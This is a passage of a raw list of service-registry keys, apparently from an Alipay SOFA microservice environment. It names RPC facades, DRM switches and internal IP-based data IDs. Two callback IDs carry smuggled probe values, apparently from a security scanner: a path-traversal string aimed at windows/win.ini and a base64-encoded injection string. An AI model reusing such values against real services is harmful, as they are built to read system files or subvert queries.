creditAmtStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmRobotQueryControlDRMResource.robotSwitchOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.audit.AuditTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.queryContextsTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstrategy.common.service.facade.fixedinvestment.FinstrategyProductAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaicontentcore.api.risk.FeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.AutoRefreshByJSONDRM.refreshOrDeleteRemote,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.etetestcore.etetestcoreDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifinmng.service.facade.CardIssuerSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:uctcep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.135.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.metadata.conf.facade.UniQueryConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_SCHEDULER_SERVERLESS_SERVICE_COLLECTION_DISTRIBUTE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.coordination.common.service.facade.api.coordination.CoordinationOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.subcard.SubCardPositionTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityGuestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paydecision:name=com.alipay.paydecision.service.client.trigger.PaydecisionTimelinessResource.t1NeedUpdateAbilityInstIds,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.QrcodeBindRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.stocktools.StockToolsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_RC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdsroalipay.qualitymonitor.service.AlertInfoService:1.0:agdsroalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopRiskTaskMemoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.core.service.serial.SerialGenerateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.**#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.cutchain.CutChainServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_G_WKCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.core.service.exceptionana.ClientPerfFirstJumpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antpim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.theme.ThemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.ParticipantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCINSTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.treedict.TreeDictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.paymentmng.core.cache.drm.FunctionControlDRMControl.pcconfigQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifecore.common.service.facade.source.SourceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-imasp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:smallProgramantProcessCallBackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.ShardingDataMigrateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@lifemock#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.vehownerprod.facade.EtcUnmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.153.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mydds.core.engine.service.api.TableMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:fincapacity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insclaiminvestcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.ToolAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imnotify.api.client.NotifyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.moneyfund.api.MftransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateBudgetManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JiebeiCreditElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertManageCmdService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.ClaimInstFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.service.impl.drm.CacheTrigger.recovery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_troubleshoot_tradeFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicadamodel.common.service.facade.api.DomainMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlcloud.core.service.sanction.interfaces.SanctionService:1.0:wise_next_sanction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebSubContractRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_ALI_TP_S_BC_TPP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.datacatalog.common.facade.spi.DataCatalogUpgradeSpi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmDownGradeResourceTrigger.supportJustChannelRoute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.36.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.api.manage.IndividuationSettingSpecialMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:rtss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.signprotocol.ProtocolSetConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.methodConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.inclusionconf.facade.service.common.TicketChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.reservationorder.ServcenterReservationOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.charityasset.common.service.facade.api.AssetTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.needRewardCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antthoth.service.facade.DagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.LifeGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smilepay.SmilePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findataprod.api.FindataprodQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.dsdc.SyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.greenowner.AutoGreenCarOwnerMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResRecSourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.SiteProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.core.model.callback.AopMessageCallBack:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_closeAccountAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_AGDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.232.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pre_open_account_auth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.cases.facade.CaseCallBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.77.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.assetflux.service.api.DepositBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_brandScenePushCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.depositback.api.QueryDepositbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.neardata.query.service.KbShopAppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Promocenter-Scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.qc.AssetQcEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.profitcore.facade.AssetYieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:creditutcoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.PaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.TeachCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antdelta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.25.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.knowman.common.service.facade.api.ZfQueryAppWarnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertCmdProxyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantUsabilityDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.trade.UserSignBrokerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:appxprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.autocheck.CheckPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.dw.service.StreamEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.VerifyReportActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.comment.ShopGoodCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.core.model.callback.AopMessageCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.93.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.article.ColumnArticleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.ExpertiseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SecurityPolicyInfoSecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.paycore.PmtMfdBizTypeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropgn.common.service.facade.RiskTaskUploadMaterialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.amspm.ardd.common.drm.RulePushDrmResource.ruleIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ecoquality@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:finsupport@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.isTaskNeedDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbsbcore.common.service.facade.BsbCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GeneralQcRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcHearCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.AntqRemotingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.211.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@gffund#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.customscenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csactive.common.service.facade.log.TaskMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ChannelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundscene.common.service.facade.api.goldsample.GoldSampleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.EntityUserMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.script.ExpressEvalService:1.0:antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ContractRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_CLUSTER_SERVERLESS_ENGINE_DISPATCH@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.44.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:apiTradeApprove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.riskApiJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promodmp.service.facade.crowd.CrowdSplitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskdataservice.common.service.facade.KeywordsLoadServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_COOP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unitradeprod.common.facade.service.MergeOrderAndPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.CaseSuiteRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcbenefitcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.chargefront.RevenueDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:pricecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ClientVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.BusiRecordMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:contentweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.versioningPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_CFIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finauth.common.service.facade.account.service.InstAccountOutRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.operation.facade.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.shadowFullAccessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.contract.ContractCallBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.ResourceStatusService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.agency.DisponseBackFileManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:memberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.agency.AgencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanRepayPay.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.validator.api.SecurityValidatorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.zproxy.BaseRouteRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmemberprod.common.service.facade.MemberManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gpwebcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaAddNodesFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iris.facade.denoise.IrisDenoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sci.scimng.facade.service.StandardModelApiFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_PRE_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.charityprod.commom.service.facade.CommonwealAccTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.licenseagreements.api.LicenseAgreementsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.118.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acordercore.common.service.facade.event.OrderEventCompensationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_CARDINFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.38.53.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.feature.common.service.facade.topology.TopologyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.antpim.biz.service.facade.BizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpartner.common.service.facade.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearchmng.service.ApiDebugService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizcore.common.service.facade.userinfo.CrdUserBaseInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loancore.friendloan.service.facade.api.query.FlcRepayPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:JWJmIiBPciBhbnR3ZWJzY2Fuc1lXNTA9TXpNd01qUTROamt0TFRFeE1EQXdNakF4TUE=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.biz.service.mobilegw.facade.UserGuideRPCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ClientProposalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.connect.rpc.api.VcardRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.promoprod.service.CampTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorEcologyPointMenuSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue16#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressionRuleMngNewConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:setMerchantConfirmHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountLogQueryFacade:1.